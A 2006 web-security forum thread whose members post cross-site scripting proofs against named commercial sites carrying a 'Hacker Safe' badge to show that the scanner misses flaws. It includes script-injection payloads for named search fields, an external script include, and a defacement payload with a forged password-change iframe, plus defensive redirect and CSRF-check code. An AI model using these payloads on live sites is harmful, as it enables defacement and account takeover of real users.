SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 11, 2006 03:56AM

At least Johnson & Johnson [www.jnj.com] has sla.ckers on its lame-ass map.

Re: Hacker safe!
Posted by: rsnake (IP Logged)
Date: November 11, 2006 04:00AM

[www.jnj.com]

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: Kyran (IP Logged)
Date: November 11, 2006 04:00AM

[www.jnj.com] XSS on that page too! :P

Beat me to it by a second. :(

- Kyran



Edited 1 time(s). Last edit at 11/11/2006 04:02AM by Kyran.

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 11, 2006 04:01AM

Excellent! aww!

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 11, 2006 06:13AM

Quote:
A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.
Kelly Jackson Higgins

says who?

[www.aetv.com]
[www.acehardware.com]
[www.redcross.org]
[www.investor.fnf.com]
[www.gnc.com]
[www.hp.com]
[www.jnj.com]
[www.nike.com]
[investor.northropgrumman.com]
[www.petco.com]
[www.ritzcamera.com]
[b2b.sony.com]
[www.sportsauthority.com]
[extsearch.worldbank.org]
[reservations.uhaul.com] FF only
[www.visacemea.com] sorry. visa.com was unpossible. this is their eastern europe domain
[www2.warnerbros.com]
[us.f275.mail.yahoo.com]

-maluc



Edited 2 time(s). Last edit at 11/11/2006 07:27AM by maluc.

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 11, 2006 09:41AM

Haha Nice job. I tried VISA also, haven't found anything yet, they're using mostly plain html (which they should). ^-^

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 11, 2006 10:55AM

well nothing is impossible i guess..

[www.usa.visa.com]

Edit: forgot to add defer :x

-maluc



Edited 2 time(s). Last edit at 11/11/2006 11:09AM by maluc.

Re: Hacker safe!
Posted by: WhiteAcid (IP Logged)
Date: November 11, 2006 01:03PM

At first look that looks like all of them.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Hacker safe!
Posted by: rsnake (IP Logged)
Date: November 11, 2006 01:55PM

Wow! That's incredible. Not totally unexpected, but still, pretty amazing. Nice job, Maluc. That's a pretty solid argument you've made.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 11, 2006 02:02PM

Yep, job done. Still i wonder what ScanAlert's answer on it meant: "We encourage them". It's a pity, i really want to inject some SQL at such sites, and go beyond the web-application layer to disprove them at least on the first 3 scan levels. but that's a bridge too far for me.

After reading the whitepaper of ScanAlert, and the methods they use, i get more questions every time i read it than good answers, like they say something like: "Hacker safe doesn't need to be installed on the server, it does it remote." so essentially it's a small "Dos" app that is pinging ports, firewall, and other snake-oil tactics: 'Cuzz most servers have only a few open ports these days, we're not in the telnet era anymore.

But i wonder, if they do it remote, then they only scan the web application layer, 'cause how is it going to cross the firewall to do some REAL penetration testing? pity them guys aren't here to answer the questionnaire.

Re: Hacker safe!
Posted by: rsnake (IP Logged)
Date: November 11, 2006 02:13PM

From one of our anonymous lurkers:

Easy to find XSS in Scan Alert customer websites

Interstate Batteries
[www.interstatebatteries.com]

Fredericks of Hollywood
[secureweb.fredericks.com]

ABES of Maine
[www.abesofmaine.com]

Illuminations
[www.illuminations.com]

A&E Entertainment
[www.aetv.com]

Yankee Candle
[www.yankeecandle.com]

PacSun
[search.pacsun.com]

Cabela's
[www.cabelas.com]

KitchenAid
[www.shopkitchenaid.com]

Lilian Vernon
[search.lillianvernon.com]

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: sjensen (IP Logged)
Date: November 11, 2006 09:32PM

[shop.2checkout.com]

search: "><script>alert('xss');</script>

[www.haveninternet.com]

search: <script>alert('xss');</script>

[www06.sbc.com]

UserID: "><script>alert('xss');</script>



Edited 4 time(s). Last edit at 11/11/2006 10:55PM by sjensen.

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 12, 2006 02:54AM


Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 13, 2006 10:43PM

well it seems visa webmasters don't work on the weekends, but they fixed both of those holes on the same day they found out about it .. their track record is still some of the speediest i've seen

so a tip of the hat to them..

-maluc

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 14, 2006 02:42AM

Yes seems fixed, i also like how they protect url breadcrumb structure with them pipes | and also the redirect protection where they check the given url and render it "phishing" if not matched. i have not tried to obfuscate it with all methods, and maybe it will fail on such thing: "http://visa.com@DWORD/phishing.php" or such, that's hard to match unless they use whitelisting.

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 14, 2006 02:59AM

they do use whitelisting, by domain. They previously whitelisted google.com and since google has an open redirect.. it left them an indirect open redirect [sla.ckers.org]

Still just as useful for phishing. But any other whitelisted domains with either an open redirect or an XSS hole (like infonow.net) can turn it back into an open redirect. Although perhaps less effective since XSS ones will usually make the XSSd page appear briefly before execution

-maluc
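
The redirect check discussed in the two posts above (userinfo and DWORD-style hosts, whitelisting by domain), as an added example that is not part of the thread and not any site's actual code. `ALLOWED_HOSTS`, `checkRedirect` and the example.com / example.net hosts are assumptions made for illustration.

```javascript
// Added example; ALLOWED_HOSTS and checkRedirect are hypothetical names.
const ALLOWED_HOSTS = new Set(['www.example.com', 'partner.example.net']);

function checkRedirect(target) {
  let url;
  try {
    url = new URL(target); // WHATWG parser, the same rules browsers apply
  } catch {
    return { ok: false, reason: 'unparseable' };
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { ok: false, reason: 'scheme' };
  }
  // In "http://trusted.example@other/", everything before '@' is userinfo,
  // not the host, so a substring or prefix match on the raw string is fooled.
  if (url.username !== '' || url.password !== '') {
    return { ok: false, reason: 'userinfo' };
  }
  // hostname is normalised by the parser: lower-cased, and DWORD, hex or
  // octal IPv4 spellings are rewritten to dotted-quad before we compare.
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    return { ok: false, reason: 'host:' + url.hostname };
  }
  return { ok: true, href: url.href };
}

// Constructed sample inputs (3221225985 is 192.0.2.1 written as a DWORD).
const SAMPLES = [
  'https://WWW.EXAMPLE.COM/offers',
  'http://www.example.com@3221225985/phishing.php',
  'http://3221225985/phishing.php',
  'https://www.example.com.attacker.test/',
  // Passes: the allowlist cannot see that this host redirects onward.
  'https://partner.example.net/redirect?url=https://attacker.test/',
];

function runSamples() {
  return SAMPLES.map((s) => checkRedirect(s));
}

for (const [i, r] of runSamples().entries()) {
  console.log(SAMPLES[i], '->', r.ok ? 'allow' : 'deny (' + r.reason + ')');
}
```

The last sample is the case maluc describes: an exact-host allowlist still passes a URL on an allowlisted host that itself redirects anywhere, so every allowlisted host has to be free of open redirects and XSS as well.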

Re: Hacker safe!
Posted by: digi7al64 (IP Logged)
Date: November 14, 2006 03:45AM

[search.ridegear.com];

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Hacker safe!
Posted by: adio_skater69 (IP Logged)
Date: November 16, 2006 10:47PM

control scan and hacker safe are stupid companies that think they know code.


btw, can you do anything besides make javascript alerts on hacker safe sites? insert some content into it! i would if i could code js! (im savvy in C++, HTML, CSS, etc.)

Re: Hacker safe!
Posted by: jungsonn (IP Logged)
Date: November 17, 2006 06:33AM

Sure, it's possible.

Though the simple XSS alert is only to show the proof of concept. RSnake has some scripts to "pseudo deface" a site when the script is executed in the URI, some do post it here now and then. never seen it? it's pretty funny.

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 17, 2006 10:54AM

Well both companies are essentially a nessus scan (or nessus clone) .. they look for flaws in 3rd party web applications.. and webservers/ftpservers. What they don't seem to do, is look for web app holes (XSS,SQL,PHP injections) in custom web pages like the ones the site's webmaster personally made. Acunetix's WebScanner does find those holes .. but it seems to not be too thorough since their own website has had multiple XSS vulnerabilities.

Scanalert is certainly in the wrong here. They claim to find XSS/SQL holes when they certainly do a poor job of it - i've yet to see a site that uses them which is free from XSS. Control Code, however, is pretty upfront that they're a repackaged nessus scan and therefore doesn't find custom web app flaws - so they should escape some of that blame.

And unfortunately, the bulk of their clients are mom and pop websites - where the neighbor's son who's good with computers is their web master.. Even when they notify them of flaws, they're likely not able to fix things more complicated than 'download the new version' fixes. Hell, most professional webdesigners and sysadmins don't know how to properly sanitize web apps - they know how to reinstall windows, run nmap, and add banned IPs to firewalls =.=

-maluc

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 17, 2006 10:56AM

and yes, the script RSnake made for it is using:
<script src=http://ha.ckers.org/s.js></script>

-maluc

Re: Hacker safe!
Posted by: adam (IP Logged)
Date: November 28, 2006 04:40PM

"pseudo deface"

so what exactly does that do?

adam

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: November 28, 2006 05:01PM

it overwrites the document that the victim sees generated by their browser..
using the equivalent of
<script>document.body.innerHTML='new page html'</script>

so it's only modifying what the victim sees client-side. Nothing is rewritten on the web server itself. That is, unless you send commands to it with the victims access level using CSRF. For example, sending a request to 'Change Password to spaghetti' by injecting an iframe
<script>document.body.innerHTML='new page<iframe src="http://thatsite.com/changepass.php?newpass=spaghetti&confirm=spaghetti"></iframe>'</script>

So using that Stallowned page, you didn't actually 'hack' any server as nothing was changed on it and you didn't have root access to it. The legality of it is quite controversial right now.

-maluc
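
A server-side check that refuses the forged change-password request described above, as an added example that is not part of the thread. The handler shape, the field names (`csrfToken`, `currentPassword`) and the helper names are assumptions for illustration; only `newpass` and `confirm` come from the post.

```javascript
// Added example; handler shape, field names and helpers are hypothetical.
const crypto = require('node:crypto');

// Random per-session token, embedded by the server in the form it renders.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Constant-time comparison so the token cannot be guessed byte by byte.
function tokensMatch(a, b) {
  const x = Buffer.from(String(a || ''));
  const y = Buffer.from(String(b || ''));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// req: { method, body }, session: { csrfToken },
// checkCurrentPassword: caller-supplied function returning true or false.
function authorizePasswordChange(req, session, checkCurrentPassword) {
  // An injected <iframe src=...> issues a GET, so a state change must never
  // be reachable that way; query-string parameters are ignored entirely.
  if (req.method !== 'POST') return { ok: false, reason: 'method' };
  const body = req.body || {};
  // Cookies ride along automatically; the token is the part a page on
  // another origin cannot read.
  if (!session.csrfToken || !tokensMatch(body.csrfToken, session.csrfToken)) {
    return { ok: false, reason: 'csrf-token' };
  }
  // Script injected into the same origin can read the token, so the change
  // also needs a secret the script does not have.
  if (!checkCurrentPassword(body.currentPassword)) {
    return { ok: false, reason: 'current-password' };
  }
  if (typeof body.newpass !== 'string' || body.newpass !== body.confirm) {
    return { ok: false, reason: 'confirm-mismatch' };
  }
  return { ok: true };
}
```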

Re: Hacker safe!
Posted by: apnovi (IP Logged)
Date: December 04, 2006 05:20PM


Re: Hacker safe!
Posted by: eyeced (IP Logged)
Date: December 18, 2006 05:17PM

Haven't any xss to add, i just thought i'd also like to say that overall in comparison to most boards there are a lot of very skilled people on here and it feels good to be part of such a knowledgeable community of people that have the same interest and actually know what they're talking about.

Re: Hacker safe!
Posted by: maluc (IP Logged)
Date: December 18, 2006 05:48PM

thanks.. and might i say your lips feel quite nice upon my bum. And so deserving after recently being honored as Time magazine's Man of The Year.. ^^


but you're right, i'm quite pleased with the quality of discussion here. Although it may've slowed my productivity for the worse, i think it's a vital resource for the community - who probably, like me, don't enjoy sifting through all the useless crap clogging other sec forums .-.

kinda surprising considering this forum is unmoderated.. hope it lasts.

-maluc

Re: Hacker safe!
Posted by: Kyran (IP Logged)
Date: December 18, 2006 06:02PM

Come to think of it...this forum has maintained its integrity with little or no moderation. I bet RSnake has some super secret script running to save us from spam and idiots.

if(user == idiot){
doBan(user)
}

?

- Kyran

Re: Hacker safe!
Posted by: rsnake (IP Logged)
Date: December 19, 2006 03:13PM

Yah, it's called laziness.sh Here's the pseudocode:

use email->verification;

if (someone_posts) {
    read $it['sometime_later'];
    do nothing;
}

if (post_ends_up_annoying_me) {
    delete $it;
} elsif (post_ends_up_in_my_inbox_cuz_it_annoyed_someone_else) {
    delete $it;
    ban $ip;
    if (got_nothing_better_to_do == true) {
        plan->retribution_on($ip);
    }
}

It's rough, but it works. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: digi7al64 (IP Logged)
Date: December 26, 2006 07:41PM

[www.roomstogo.com]

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Hacker safe!
Posted by: nEUrOO (IP Logged)
Date: December 27, 2006 04:52PM



